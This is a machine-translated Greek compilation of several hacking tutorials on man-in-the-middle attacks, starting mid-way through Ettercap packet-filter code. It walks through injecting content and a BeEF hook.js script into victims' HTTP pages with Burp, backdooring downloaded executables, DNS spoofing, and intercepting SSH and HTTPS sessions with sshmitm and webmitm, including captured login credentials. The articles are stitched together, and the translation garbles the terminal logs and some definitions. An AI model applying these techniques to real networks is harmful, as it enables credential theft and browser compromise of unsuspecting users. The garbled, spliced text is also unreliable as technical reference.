"s/\x03com\x00/\x02my\x04page\x02de\x00/g" /tmp/payload"); udp.len += 7; exec("/bin/rm /tmp/payload"); msg("faked"); } # фильтровать только указанный IP адрес if (ip.src == "192.168.0.2") { drop(); } # делать то же самое для IPv6 if (ipv6.src == "2001:db8::1") { drop(); } # комбинируем IPv4 и IPv6 if (eth.proto == IP && ip.dst == "192.168.0.2") { msg("drop IPv4"); drop(); } if (eth.proto == IP6 && ipv6.dst == "2001:db8::1") { msg("drop IPv6"); drop(); } # транслировать tcp пакеты с порта 80 на 81 if (tcp.dst == 80) { tcp.dst -= 1; tcp.dst += 2; } # найти и покалечить пакеты ESP if (ip.proto == ESP) { DATA.data = "DEADDECAF"; }

4.2 Παραπλάνηση δεδομένων με Burp

Εκκινούμε το Ettercap και το Burp όπως περιγράφεται στην παράγραφο 1.2 ή στην παράγραφο 2.2.

Στο Burp μεταβείτε στο Proxy -> Options . Εκεί βρίσκουμε το Match and Replace. Κάντε κλικ στην Προσθήκη για να προσθέσετε έναν νέο κανόνα.

Η κεφαλίδα αιτήματος είναι η κεφαλίδα αιτήματος
Σώμα αιτήματος - φορέας αιτήματος
Επικεφαλίδα απόκρισης - κεφαλίδα απόκρισης
Σώμα απόκρισης - σώμα απόκρισης
Αίτημα ονόματος παραμέτρου - Αίτημα ονόματος παραμέτρου
Αίτημα τιμής παραμέτρου - Αίτημα τιμής παραμέτρου
Αίτημα πρώτης γραμμής - Η πρώτη γραμμή του αιτήματος

Εάν πρέπει να αλλάξετε τα δεδομένα που μεταδίδονται με τη μέθοδο GET, τότε αυτό ισχύει για τις κεφαλίδες.

Στη σήμανση HTML, υπάρχει επίσης ένα τέτοιο πράγμα όπως το κεφάλι (ετικέτα κεφαλής). Αυτά που αναφέρονται παραπάνω δεν έχουν καμία σχέση με αυτόν τον τίτλο. Λίγο πιο πάνω λέγεται για τις κεφαλίδες πακέτων. Εάν θέλετε να αλλάξετε το περιεχόμενο σελίδες HTML, τότε θα πρέπει πάντα να επιλέγετε το σώμα απόκρισης αντί για την κεφαλίδα Αίτημα, ακόμα κι αν πρόκειται να αλλάξετε το περιεχόμενο της ετικέτας κεφαλής (για παράδειγμα, τον τίτλο).

Εάν δεν είστε εξοικειωμένοι με κανονικές εκφράσεις, τότε, κατ 'αρχήν, είναι εντάξει: η HTML συγχωρεί πολλά και ό,τι δεν καταλαβαίνει, απλώς αγνοεί - μπορείτε να το χρησιμοποιήσετε. Αν ξέρεις να χρησιμοποιείς κανονικές εκφράσεις, τότε σε σέβομαι.)))

Για παράδειγμα, ας δημιουργήσουμε έναν νέο κανόνα, αλλάξουμε την κεφαλίδα Αίτημα σε σώμα απόκρισης. Στον ίδιο τον κανόνα, θα αλλάξουμε

χωρίς τίτλο

Επιλέξτε το πλαίσιο για αντιστοίχιση Regex .

Τώρα σε όλους τους ιστότοπους (χωρίς HTTPS) αντί για τον τίτλο θα υπάρχει No Title:

Εισαγάγετε μια αυθαίρετη γραμμή μετά την ετικέτα σώματος (θα είναι η πρώτη γραμμή στο κείμενο). Η κεφαλίδα αιτήματος αλλάζει σε σώμα απόκρισης. Αλλάζουμε

Επιλέξτε το πλαίσιο για αντιστοίχιση Regex .

Στην επάνω δεξιά γωνία (ανάλογα με τη διάταξη) εμφανίζεται η επιγραφή "I am cool!". Μπορείτε να εισαγάγετε CSS, κώδικα JavaScript, οποιοδήποτε κείμενο - οτιδήποτε. Μπορείτε γενικά να διαγράψετε τα πάντα από τη σελίδα και στη συνέχεια να τη γεμίσετε με το δικό σας περιεχόμενο - όλα εξαρτώνται από τη φαντασία σας.

Υπήρχε μια ιδέα να τροποποιηθεί ελαφρώς κάθε φόρμα, έτσι ώστε τα δεδομένα να αποστέλλονται στον αρχικό διακομιστή και στον διακομιστή του εισβολέα (εφαρμογή πολλαπλής υποβολής για κάθε φόρμα). Αλλά έχοντας αιτιολογήσει ότι εάν τα μεταδιδόμενα δεδομένα δεν είναι κρυπτογραφημένα και έχουμε πρόσβαση σε αυτά, τότε τα βλέπουμε ούτως ή άλλως, δεν χρειάζεται να τα στείλουμε σε κανένα διακομιστή. Ωστόσο, αν κάποιος το χρειάζεται, ένα πραγματικά λειτουργικό παράδειγμα αποστολής δεδομένων από μια φόρμα σε πολλούς διακομιστές ταυτόχρονα.

5. Σύνδεση BeEF

Για να αρχίσουμε να χρησιμοποιούμε τις δυνατότητες του BeEF, πρέπει να ενσωματώσουμε ένα αρχείο JavaScript στο HTML, συνήθως μια γραμμή όπως:

Οι επόμενες δύο μέθοδοι διαφέρουν μόνο ως προς τη μέθοδο ενσωμάτωσης αυτής της συμβολοσειράς.

5.1 Σύνδεση BeEF με φίλτρα Ettercap

[η ενότητα θα ετοιμαστεί αργότερα]

5.2 Γάντζο BeEF με Burp

Πρέπει να ξεκινήσετε ακριβώς το ίδιο όπως γράφεται στην παράγραφο 4.2. Αλλά αντί να αντικαταστήσουμε τις κεφαλίδες και να προσθέσουμε κείμενο στον ιστότοπο, θα εισάγουμε τον κώδικα JavaScript ως συμβολοσειρά:

Στην περίπτωσή μου, αυτό το αρχείο είναι διαθέσιμο στην IP 192.168.1.36 στη θύρα 3000. Το αρχείο ονομάζεται hook.js (μπορείτε να το αλλάξετε στις ρυθμίσεις). Εκείνοι. στην περίπτωσή μου, πρέπει να κάνω ένεση στη γραμμή:

Αυτό μπορεί να γίνει, για παράδειγμα, δημιουργώντας έναν νέο κανόνα, αλλάξτε την κεφαλίδα Αίτημα σε σώμα απόκρισης. Στον ίδιο τον κώδικα HTML, θα πρέπει να υπάρχει αντικατάσταση

Τέλεια, όταν ανοίγετε έναν ιστότοπο που δεν έχει HTTPS, εισάγεται ένας κώδικας JavaScript στον κώδικα HTML, ο οποίος σας επιτρέπει να συλλέγετε πληροφορίες μέσω ενός συνδεδεμένου προγράμματος περιήγησης και να εκτελείτε διάφορες επιθέσεις:

6. Λοίμωξη με κερκόπορτες

Μπορείτε να αντικαταστήσετε και να μολύνετε εκτελέσιμα αρχεία τόσο με τη βοήθεια των φίλτρων Ettercap [τα οποία για κάποιο λόγο δεν λειτουργούν εδώ και πολύ καιρό] όσο και με τη βοήθεια εφαρμογών τρίτων. Για παράδειγμα, το BDFProxy μπορεί να το κάνει αυτό εν κινήσει. Δυστυχώς, το BDFProxy εξακολουθεί να μην μπορεί να ανακτήσει από την ενημέρωση του Backdoor Factory τον Απρίλιο (του 2016): στην Python, το πακέτο libmproxy έχει μετονομαστεί σε mitmproxy. Για το BDFProxy, το πακέτο libmproxy είναι μια απαραίτητη εξάρτηση· το πρόγραμμα δεν θα εκτελεστεί χωρίς αυτό το πακέτο. Επομένως, τώρα, πριν από την "επισκευή" του BDFProxy, δεν μπορεί να χρησιμοποιηθεί, επειδή ακόμη και με εγκατεστημένο το Backdoor Factory, το πρόγραμμα BDFProxy παραπονιέται για την έλλειψη της βιβλιοθήκης libmproxy ...

Μια παρόμοια λειτουργία μπορεί να γίνει με το Burp Suite. Παρουσιάζεται ο αλγόριθμος βήμα προς βήμα, δεν έχει νόημα να τον ξαναγράψουμε σε αυτήν την ενότητα.

7. Χρήση πρόσθετων Ettercap

Μπορείτε να βρείτε πληροφορίες σχετικά με τα πρόσθετα Ettercap. Υπάρχουν αρκετά πρόσθετα, αυτά που περιγράφονται παρακάτω μου φαίνονται τα πιο ενδιαφέροντα.

Τα πρόσθετα μπορούν να συνδεθούν κατά την εκκίνηση του Ettercap, για αυτό υπάρχει μια επιλογή:

P, --plugin εκτελέστε αυτό

Τα πρόσθετα μπορούν επίσης να φορτωθούν από το GUI:

[ΥΛΙΚΟ ΣΕ ΠΡΟΕΤΟΙΜΑΣΙΑ]

7.1 arp_cop

Αναφέρει ύποπτη δραστηριότητα ARP παρακολουθώντας παθητικά αιτήματα/απαντήσεις ARP. Μπορεί να αναφέρει απόπειρες δηλητηρίασης ARP ή απλές διενέξεις IP ή αλλαγές IP. Εάν δημιουργείτε μια αρχική λίστα κεντρικών υπολογιστών, τότε η προσθήκη θα λειτουργεί με μεγαλύτερη ακρίβεια.

Ettercap -TQP arp_cop //

Ένα παράδειγμα πραγματικής ανίχνευσης πλαστογράφησης ARP:

Επεκτείνουν

[email προστατευμένο] ~ $ sudo ettercap -TQP arp_cop // κωδικός πρόσβασης για mial: ettercap 0.8.2 πνευματικά δικαιώματα 2001-2015 Ομάδα ανάπτυξης Ettercap Ακρόαση σε: eth0 -> 08:00:27:A3:08:4A 192.168.15.302 fe. :a00:27ff:fea3:84a/64 Η ανατομή SSL χρειάζεται μια έγκυρη δέσμη ενεργειών "redir_command_on" στο αρχείο etter.conf Τα δικαιώματα μειώθηκαν στο EUID 65534 EGID 65534... 33 πρόσθετα 42 ανατομείς πρωτοκόλλου 57 θύρες παρακολούθησης 57 δακτυλικών αποτυπωμάτων06p ma2 δακτυλικό αποτύπωμα 2182 γνωστές υπηρεσίες Τυχαιοποίηση 255 κεντρικών υπολογιστών για σάρωση... Σάρωση ολόκληρης της μάσκας δικτύου για 255 κεντρικούς υπολογιστές... * |======================== = ========================>| 100,00 % 3 κεντρικοί υπολογιστές προστέθηκαν στη λίστα κεντρικών υπολογιστών... Έναρξη Ενοποιημένου sniffing... Μόνο κείμενο Ενεργοποιήθηκε η διεπαφή... Πατήστε "h" για ενσωματωμένη βοήθεια Ενεργοποίηση προσθήκης arp_cop... arp_cop: εκτελείται προσθήκη... arp_cop: (νέος κεντρικός υπολογιστής ) 192.168.1.1 arp_cop: (ΠΡΟΕΙΔΟΠΟΙΗΣΗ) 192.168.1.35 προσποιείται ότι είναι 192.168.1.1 arp_cop: (ΠΡΟΕΙΔΟΠΟΙΗΣΗ) 192.168.1.35 προσποιείται ότι είναι 192.168.1.35 προσποιείται ότι είναι 192.168.1.35. προσποιείται ότι είναι 192.168.1.1 arp_cop: (ΠΡΟΕΙΔΟΠΟΙΗΣΗ ) 192.168.1.35 προσποιείται ότι είναι 192.168.1.1 arp_cop: (ΠΡΟΕΙΔΟΠΟΙΗΣΗ) 192.168.1.35 προσποιείται ότι είναι 192.168 .1.1 arp_cop: (ΠΡΟΕΙΔΟΠΟΙΗΣΗ) 192.165 προσποιείται ότι είναι 192.168.1.1.p. ARNING) 192.168.1.35 προσποιείται ότι είναι 192.168 .1.1 arp_cop: (ΠΡΟΕΙΔΟΠΟΙΗΣΗ) 192.168.1.35 προσποιείται ότι είναι 192.168. 1.1 arp_cop: (ΠΡΟΕΙΔΟΠΟΙΗΣΗ) 192.168 .1.35 προσποιείται ότι είναι 192.168.1.1.1 προσποιείται ότι είναι 192.168.1.1.1 arpNING3.19 .168.1.1 arp_cop: (ΠΡΟΕΙΔΟΠΟΙΗΣΗ) 192.168 Το .1.35 προσποιείται ότι είναι 192.168.1.1 arp_cop: (ΠΡΟΕΙΔΟΠΟΙΗΣΗ) 192.168. 1.35 προσποιείται ότι είναι 192.168.1.1 arp_cop: (ΠΡΟΕΙΔΟΠΟΙΗΣΗ) 192.168.1.35 προσποιείται ότι είναι 11p. Το 168.1.35 προσποιείται ότι είναι 192.168.1.1 p_cop: (ΠΡΟΕΙΔΟΠΟΙΗΣΗ) 192.168.1.35 προσποιείται ότι είναι 192.168.1.1 arp_cop: (ΠΡΟΕΙΔΟΠΟΙΗΣΗ) 192.168.1.35 προσποιείται ότι είναι 192.168.1.1 arp_cop. arp_cop: (ΠΡΟΕΙΔΟΠΟΙΗΣΗ) 192.168.1.35 προσποιείται ότι είναι 192.168.1.1 arp_cop: (ΠΡΟΕΙΔΟΠΟΙΗΣΗ) 192.168.1.35 προσποιείται ότι είναι 192.168.1.1 arp_cop: (ΠΡΟΕΙΔΟΠΟΙΗΣΗ) RNING) 192.168.1.35 192.168.1.35 προσποιείται ότι είναι 192.168.1.1. Το .1.35 προσποιείται ότι είναι 192.168.1.1 arp_cop: (ΠΡΟΕΙΔΟΠΟΙΗΣΗ) Το 192.168.1.35 προσποιείται ότι είναι 192.168. 1.1 arp_cop: (ΠΡΟΕΙΔΟΠΟΙΗΣΗ) 192.168.1.35 προσποιείται ότι είναι 192.168.1.1 arp_cop: (ΠΡΟΕΙΔΟΠΟΙΗΣΗ) 192.168.1.35 προσποιείται ότι είναι 192.168.1.1 .1 arpN11.1 .1 arpN119. 2.168.1.1 arp_cop: (ΠΡΟΕΙΔΟΠΟΙΗΣΗ) Το 192.168.1.35 προσποιείται ότι είναι 192.168.1.1 arp_cop: (ΠΡΟΕΙΔΟΠΟΙΗΣΗ) 192.168.1.35 προσποιείται ότι είναι 192.168.1.1 arp_cop: (ΠΡΟΕΙΔΟΠΟΙΗΣΗ) 192.168.1 σε .8p. NING) 192.168.1.35 προσποιείται ότι είναι 192.168.1.1 arp_cop: (ΠΡΟΕΙΔΟΠΟΙΗΣΗ) 192.168.1.35 προσποιείται ότι είναι 192.168.1.1 arp_cop: (ΠΡΟΕΙΔΟΠΟΙΗΣΗ) 192.168.1.35 προσποιείται ότι είναι 192.168.1.1.1.1.1. 192.168.1.1 arp_cop: (ΠΡΟΕΙΔΟΠΟΙΗΣΗ) 192.168 Το .1.35 προσποιείται ότι είναι 192.168.1.1 arp_cop: (ΠΡΟΕΙΔΟΠΟΙΗΣΗ) Το 192.168.1.35 προσποιείται ότι είναι 192.168.1.1 ... .........................

7.2 αυτόματη προσθήκη

Θα προσθέσει αυτόματα νέα θύματα καθώς συνδέονται στο mitm poisoning ARP. Αναζητά αιτήματα ARP στο τοπικό δίκτυο και αν βρεθεί, το πρόσθετο θα προσθέσει τον κεντρικό υπολογιστή στη λίστα των θυμάτων, εάν η λίστα είχε καθοριστεί ως ΣΤΟΧΟΣ. Ο κεντρικός υπολογιστής προστίθεται όταν εμφανίζεται ένα αίτημα arp από αυτόν.

7,3 chk_poison

Ελέγχει εάν οι μονάδες poison arp στο ettercap είναι επιτυχείς. Στέλνει πλαστά πακέτα ηχούς ICMP σε όλα τα θύματα δηλητηρίασης, προσποιούμενοι ότι είναι κάθε θύμα. Μπορεί να λάβει μια απάντηση ICMP με τη διεύθυνση MAC ως προορισμό, πράγμα που σημαίνει ότι η δηλητηρίαση μεταξύ αυτών των δύο στόχων είναι επιτυχής. Ελέγχει και τις δύο διαδρομές κάθε σύνδεσης.

7.4 dns_spoof

Αυτό το πρόσθετο διακόπτει τα αιτήματα DNS και απαντά με μια πλαστή (ψεύτικη) απάντηση. Μπορείτε να επιλέξετε σε ποια διεύθυνση θα ανταποκρίνεται το πρόσθετο επεξεργαζόμενοι το αρχείο etter.dns. Το πρόσθετο παρεμποδίζει αιτήματα A, AAAA, PTR, MX, WINS, SRV και TXT. Εάν ήταν ένα ερώτημα A, τότε το όνομα αναζητείται στο αρχείο και επιστρέφεται η διεύθυνση IP (μπορείτε να χρησιμοποιήσετε χαρακτήρες μπαλαντέρ στο όνομα).

Το ίδιο ισχύει και για τα αιτήματα AAAA.

7.5 find_conn

Ένα πολύ απλό πρόσθετο που ακούει αιτήματα ARP για να σας δείξει όλους τους στόχους με τους οποίους θέλει να επικοινωνήσει ο κεντρικός υπολογιστής. Μπορεί επίσης να σας βοηθήσει να βρείτε διευθύνσεις σε άγνωστα LAN.

ettercap -TQzP find_conn ettercap -TQu -i eth0 -P find_conn

7.6 find_ettercap

Προσπάθειες αναγνώρισης πακέτων ettercap που αποστέλλονται στο LAN. Μπορεί να είναι χρήσιμο για τον εντοπισμό κάποιου που προσπαθεί να χρησιμοποιήσει το ettercap. Μην βασίζεστε σε αυτό 100%, καθώς τα τεστ λειτουργούν μόνο για συγκεκριμένες ακολουθίες/αριθμούς αναγνωριστικού.

7.7 scan_poisoner

Ελέγξτε αν κάποιος δολώνει μεταξύ οποιουδήποτε από τους οικοδεσπότες στη λίστα και εμάς. Αρχικά, ελέγχει εάν δύο κεντρικοί υπολογιστές στη λίστα έχουν το ίδιο Διεύθυνση MAC. Αυτό μπορεί να σημαίνει ότι ένας από αυτούς μας δηλητηριάζει προσποιούμενος ότι είναι ο άλλος. Μπορεί να δημιουργήσει πολλά ψευδώς θετικά σε ένα περιβάλλον arp μεσολάβησης. Πρέπει να δημιουργήσετε μια λίστα κεντρικών υπολογιστών για να εκτελέσετε αυτόν τον έλεγχο. Μετά από αυτό, στέλνει πακέτα icmp echo σε κάθε κεντρικό υπολογιστή στη λίστα και ελέγχει εάν η διεύθυνση mac της προέλευσης της απάντησης είναι διαφορετική από τη διεύθυνση που αποθηκεύσαμε στη λίστα με αυτήν την IP. Αυτό μπορεί να σημαίνει ότι κάποιος δηλητηριάζει αυτόν τον κεντρικό υπολογιστή προσποιούμενος ότι έχει τη διεύθυνση IP μας και προωθεί τα πακέτα που έχουν υποκλαπεί σε εμάς. Δεν μπορείτε να εκτελέσετε αυτήν την ενεργή δοκιμή σε μη προσβλητική (ακίνδυνη) λειτουργία.

Ettercap -TQP scan_poisoner //

7.8 search_promisc

Προσπαθεί να ανακαλύψει εάν κάποιος ρουθουνίζει (ακούει) σε ακατάλληλη λειτουργία. Στέλνει δύο διαφορετικά ακατάλληλα αιτήματα arp σε κάθε στόχο στη λίστα των κεντρικών υπολογιστών και περιμένει για απαντήσεις. Εάν η απόκριση προήλθε από έναν κεντρικό υπολογιστή-στόχο, είναι λίγο πολύ πιθανό ότι αυτός ο στόχος έχει μια κάρτα δικτύου σε ακατάλληλη λειτουργία. Μπορεί να δημιουργήσει ψευδείς συναγερμούς. Μπορείτε να το εκτελέσετε είτε από τη γραμμή εντολών είτε από το μενού προσθηκών. Επειδή ακούει για απαντήσεις arp, είναι καλύτερο να μην τις χρησιμοποιείτε κατά την αποστολή αιτημάτων arp.

ettercap -TQP search_promisc /192.168.0.1/ ettercap -TQP search_promisc //

Ένα παράδειγμα επιτυχούς εικασίας δύο NIC σε ακατάλληλη λειτουργία:

Επεκτείνουν

[email προστατευμένο]:~# ettercap -TQP search_promisc ettercap 0.8.2 πνευματικά δικαιώματα 2001-2015 Ομάδα ανάπτυξης του Ettercap Ακρόαση σε: eth0 -> 08:00:27:AF:30:B9 192.168.1.35/255.2507:feaff. :30b9/64 Η ανατομή SSL χρειάζεται ένα έγκυρο σενάριο "redir_command_on" στο αρχείο etter.conf Το Ettercap ενδέχεται να μην λειτουργεί σωστά. Το /proc/sys/net/ipv6/conf/eth0/use_tempaddr δεν έχει οριστεί σε 0. Τα δικαιώματα μειώθηκαν στο EUID 65534 EGID 65534... 33 πρόσθετα 42 ανατομείς πρωτοκόλλου 57 θύρες παρακολουθούνται 20388 mac προμηθευτής δακτυλικών αποτυπωμάτων 18 OS 176 γνωστές υπηρεσίες : δεν καθορίστηκαν σενάρια, δεν εκκινήθηκε! Τυχαιοποίηση 255 κεντρικών υπολογιστών για σάρωση... Σάρωση ολόκληρης της μάσκας δικτύου για 255 κεντρικούς υπολογιστές... * |============================ = ====================>| 100,00 % 5 κεντρικοί υπολογιστές προστέθηκαν στη λίστα κεντρικών υπολογιστών... Έναρξη Ενοποιημένου sniffing... Μόνο κείμενο Ενεργοποιήθηκε η διεπαφή... Πατήστε "h" για ενσωματωμένη βοήθεια Ενεργοποίηση προσθήκης search_promisc... search_promisc: Αναζήτηση promisc NIC... Λιγότερο πιθανώς sniffing NIC : - 192.168.1.36 - 192.168.1.34 Πιθανότατα sniffing NIC: - ΚΑΝΕΝΑ Κλείσιμο διεπαφής κειμένου... Τερματισμός ettercap... Ο καθαρισμός Lua ολοκληρώθηκε! Το ενιαίο ρουφήξιμο σταμάτησε.

7.9 sslstrip

Κατά την εκτέλεση μιας επίθεσης SSL mitm, το ettercap αντικαθιστά το πραγματικό πιστοποιητικό ssl με το δικό του. Ένα ψεύτικο πιστοποιητικό δημιουργείται εν κινήσει και όλα τα πεδία συμπληρώνονται σύμφωνα με το πραγματικό πιστοποιητικό που παρουσιάζει ο διακομιστής.

(62%)

(56.5%)

(ΤΥΧΑΙΟ - 0,2%)

Σε αυτό το άρθρο, θα συζητήσουμε μαζί σας τις επιθέσεις Man-in-the-Middle ή μάλλον τη μέθοδο
ανακατεύθυνση της κυκλοφορίας SSH και HTTP χρησιμοποιώντας μια επίθεση Man in the Middle. Ας μην τραβήξουμε τη γάτα από την ουρά, αλλά ας ασχοληθούμε.

Man in the Middle (εν συντομία, MitM, από τα ρωσικά απλά - "επίθεση του μεσάζοντα" ή "άνθρωπος
στη μέση") είναι ένας τύπος επίθεσης που βασίζεται στην ανακατεύθυνση της κυκλοφορίας μεταξύ δύο μηχανών για την αναχαίτιση πληροφοριών - περαιτέρω μελέτη, καταστροφή ή τροποποίηση. Έτσι, το πρώτο πράγμα που χρειαζόμαστε είναι το πακέτο dsniff (θα δείτε έναν σύνδεσμο προς το πακέτο στο το τέλος του άρθρου). Γιατί, επειδή αυτό το πακέτο έχει όλα τα απαραίτητα βοηθητικά προγράμματα, συμπεριλαμβανομένων των sshmitm (ανακατεύθυνση της κυκλοφορίας SSH) και httpmitm (ανακατεύθυνση της κυκλοφορίας HTTP), που μπορούν να παρακάμψουν το ακόλουθο σχήμα ασφαλείας: από όσο γνωρίζετε, πρωτόκολλα με κρυπτογράφηση δεδομένων είναι αρκετά -τόσο "ασφαλείς" (κρυπτογράφηση για βοήθεια :)) και δεν επιτρέπουν επιθέσεις "πάνω από" το επίπεδο δικτύου. Το κλειδί κρυπτογράφησης είναι άγνωστο στον χάκερ - είναι αδύνατο να αποκρυπτογραφήσει τα δεδομένα και να εισαγάγει την εντολή επίσης. Όλα φαίνονται να είσαι καλά, αλλά να πώς
αφού τα προγράμματα επίθεσης MitM (sshmitm και httpmitm) από το πακέτο dsniff μπορούν να παρακάμψουν αυτό το σύστημαασφάλεια (μπορείτε να ξεπεράσετε σχεδόν τα πάντα). Όλα αυτά γίνονται σύμφωνα με την ακόλουθη αρχή:
ο ενδιάμεσος κεντρικός υπολογιστής λαμβάνει το αίτημα από τον πελάτη, «λέγοντάς» του ότι είναι ο διακομιστής και στη συνέχεια συνδέεται με τον πραγματικό διακομιστή.
Το δεύτερο πράγμα που χρειαζόμαστε είναι ίσια χέρια, το τέταρτο - το πιο σημαντικό - επιθυμία και, φυσικά, ένα θύμα, δηλαδή ένας υπολογιστής στον οποίο θα επιτεθούμε.

Ανακατεύθυνση της κυκλοφορίας SSH

Αφού ετοιμάσατε την εργαλειοθήκη, καταλάβατε τι ήταν τι και γιατί :). Λάβετε το sshmitm - τώρα θα ανακατευθύνουμε την κυκλοφορία SSH (όλα όσα δεν κατάλαβα με το θεωρητικό μέρος - διαβάστε παραπάνω)
χρησιμοποιώντας το, αξιοποιώντας τις ελλείψεις του σημερινού PKI (υποδομή δημόσιου κλειδιού - ένα σύστημα διαχείρισης κλειδιών που βασίζεται σε
μέθοδοι ασύμμετρης κρυπτογραφίας). Ας δούμε τη σύνταξη
sshmitm:

sshmitm [-d] [-I] [-p port] host

ρε
να επιτρέπεται η έξοδος εντοπισμού σφαλμάτων (δηλαδή πιο προηγμένη λειτουργία)

Εγώ
πειρατεία συνεδρίας

Θύρα P
θύρα ακρόασης

πλήθος
τη διεύθυνση του απομακρυσμένου κεντρικού υπολογιστή του οποίου οι συνεδρίες θα υποκλαπούν

Λιμάνι
θύρα στον απομακρυσμένο κεντρικό υπολογιστή

Όλα φαίνονται απλά και καλόγουστα - δεν υπάρχει τίποτα περίπλοκο :). Ας ξεκινήσουμε την επίθεση!

# sshmitm server.target.gov // καθορίστε τον διακομιστή SSH σας
sshmitm: αναμετάδοση στον διακομιστή server.target.gov

Δεδομένου ότι δεν έχουμε ένα πραγματικό κλειδί SSH, ο διερμηνέας εντολών του επιτέθηκε
θα εμφανίσει ένα αίτημα για έλεγχο του κλειδιού κεντρικού υπολογιστή, όλα θα μοιάζουν κάπως έτσι:

clientmachine$server.target.gov
@ΠΡΟΕΙΔΟΠΟΙΗΣΗ: Η ΑΝΑΓΝΩΡΙΣΗ ΑΠΟΣΤΑΣΕΙΣ HOST ΕΧΕΙ ΑΛΛΑΞΕΙ! @
ΕΙΝΑΙ ΠΙΘΑΝΟ ΚΑΠΟΙΟΣ ΝΑ ΚΑΝΕΙ ΚΑΤΙ ΑΣΧΟΛΟ!
Κάποιος θα μπορούσε να σας κρυφακούει αυτή τη στιγμή (επίθεση άνθρωπος στη μέση)!
Είναι επίσης πιθανό το κλειδί κεντρικού υπολογιστή RSA να έχει μόλις αλλάξει.
Επικοινωνήστε με τον διαχειριστή του συστήματός σας.

Και τότε ο χρήστης θα αποφασίσει αν θα συνδεθεί ή όχι. Αν ναι, τότε θα έχουμε τον πλήρη έλεγχο της συνεδρίας SSH.
ΑΛΛΑ! Εάν ο χρήστης δεν έχει συνδεθεί ποτέ σε αυτό το καρότσι, ενδέχεται να εμφανιστεί το ακόλουθο μήνυμα:

Η αυθεντικότητα του κεντρικού υπολογιστή "server.target.gov" δεν μπορεί να εξακριβωθεί
Το δακτυλικό αποτύπωμα κλειδιού RSA είναι
μπλα:μπλα:μπλα;μπλα;μπλα.........
Είστε βέβαιοι ότι θέλετε να συνεχίσετε τη σύνδεση (ναι/όχι);

Εδώ ο χρήστης έχει επίσης δύο επιλογές - να συνδεθεί ή όχι. Αν ναι, τότε παρεμποδίσαμε τη συνεδρία, αν όχι, τότε αλίμονο... :(.
Σε γενικές γραμμές, η επίθεση ήταν επιτυχής εάν ο χρήστης συνδεθεί και το sshmitm, με τη σειρά του, καταγράφει όλα τα περάσματα και τις συνδέσεις και είναι πολύ ευανάγνωστο 🙂
Φυσικά, αυτός δεν είναι ο μόνος υποκλοπής συνεδρίας SSH, αλλά μόλις εξοικειωθείτε με αυτό, θα κατακτήσετε εύκολα τον άλλο 🙂

Ανακατεύθυνση της κυκλοφορίας HTTP

Τώρα θα ανακατευθύνουμε την κυκλοφορία HTTP. Και πάλι, χρειαζόμαστε ένα ήδη επιλεγμένο εργαλείο: το httpmitm, το οποίο ακούει σε θύρες 80- (HTTP -) και 443- (HTTPS -), παρεμποδίζει αιτήματα WEB, στη συνέχεια συνδέεται στον διακομιστή και προωθεί αιτήματα στον υπολογιστή-πελάτη. Το πρόγραμμα δημιουργεί επίσης κλειδιά SSL και πιστοποιητικά SSL χρησιμοποιώντας OpenSSL. Μετά αφού προσπάθησα
συνδέεται με τον ιστότοπο (target.gov), το πρόγραμμα περιήγησης θα ελέγξει το πιστοποιητικό SSL. Δεδομένου ότι τα πιστοποιητικά δεν ταιριάζουν, το πρόγραμμα περιήγησης του χρήστη θα προειδοποιήσει
λάθος πιστοποιητικό SSL. Από την πλευρά του επιτιθέμενου, θα μοιάζει κάπως έτσι:

#webmitm -d
webmitm: αναμετάδοση με διαφάνεια
webmitm: νέα σύνδεση από
GET [link]/uzerz.php?user=hellknights&password=neskaju1qwerty HTTP/[έκδοση]
Τύπος σύνδεσης]
Διοργανωτής: www.target.gov
User-Agent: [πληροφορίες για το σύστημα, πρόγραμμα περιήγησης]
[κλπ, κλπ, κλπ]
Cookie: [cookies]

Έτσι φαίνεται από έξω -
παρεμποδίζεται μια σύνδεση SSL, αρπάζοντας μη κρυπτογραφημένα δεδομένα.

συμπέρασμα

Σε αυτό το άρθρο, συζητήσαμε μαζί σας την ανακατεύθυνση της κυκλοφορίας SSH και HTTP χρησιμοποιώντας την επίθεση Man in the Middle - σαφώς, λεπτομερώς, εν συντομία. Άλλα προγράμματα ανακατεύθυνσης HTTP και SSH
Με τη βοήθεια του MitM θα κατακτήσετε γρήγορα την κυκλοφορία αν τα έχετε κατακτήσει και αυτά :)). Αν κάτι δεν ήταν ξεκάθαρο - τότε.

Υποκλοπή δεδομένων μέσω του δικτύου είναι η λήψη οποιασδήποτε πληροφορίας από μια απομακρυσμένη συσκευή υπολογιστή. Μπορεί να αποτελείται από τα προσωπικά στοιχεία του χρήστη, τα μηνύματά του, τα αρχεία επισκέψεων ιστοσελίδων. Η λήψη δεδομένων μπορεί να πραγματοποιηθεί με λογισμικό υποκλοπής spyware ή με χρήση sniffers δικτύου.

Το Spyware είναι ειδικό λογισμικό ικανό να καταγράφει όλες τις πληροφορίες που μεταδίδονται μέσω του δικτύου από έναν συγκεκριμένο σταθμό εργασίας ή συσκευή.

Ο ανιχνευτής είναι ένα πρόγραμμα ή εξοπλισμός υπολογιστή που παρακολουθεί και αναλύει την κίνηση που διέρχεται από το δίκτυο. Το sniffer σάς επιτρέπει να συνδεθείτε σε μια περίοδο σύνδεσης ιστού και να εκτελέσετε διάφορες λειτουργίες για λογαριασμό του κατόχου του υπολογιστή.

Εάν οι πληροφορίες δεν μεταδίδονται σε πραγματικό χρόνο, spywareδημιουργούν αναφορές που είναι βολικές για προβολή και ανάλυση πληροφοριών.

Η δικτυακή υποκλοπή μπορεί να οργανωθεί νόμιμα ή να εκτελεστεί παράνομα. Το κύριο έγγραφο που καθορίζει τη νομιμότητα της απόκτησης πληροφοριών είναι η Σύμβαση για το έγκλημα στον κυβερνοχώρο. Ιδρύθηκε στην Ουγγαρία το 2001. Οι νομικές απαιτήσεις των διαφορετικών κρατών μπορεί να διαφέρουν κάπως, αλλά η βασική έννοια είναι η ίδια για όλες τις χώρες.

Ταξινόμηση και μέθοδοι υποκλοπής δεδομένων μέσω του δικτύου

Σύμφωνα με τα παραπάνω, η υποκλοπή πληροφοριών μέσω του δικτύου μπορεί να χωριστεί σε δύο τύπους: εξουσιοδοτημένη και μη εξουσιοδοτημένη.

Η εξουσιοδοτημένη σύλληψη δεδομένων πραγματοποιείται για διάφορους σκοπούς, που κυμαίνονται από την προστασία εταιρικών πληροφοριών έως τη διασφάλιση της ασφάλειας του κράτους. Οι λόγοι για την εκτέλεση μιας τέτοιας επέμβασης καθορίζονται από τη νομοθεσία, τις ειδικές υπηρεσίες, τους αξιωματικούς επιβολής του νόμου, τους ειδικούς διοικητικές οργανώσειςκαι τις υπηρεσίες ασφαλείας της εταιρείας.

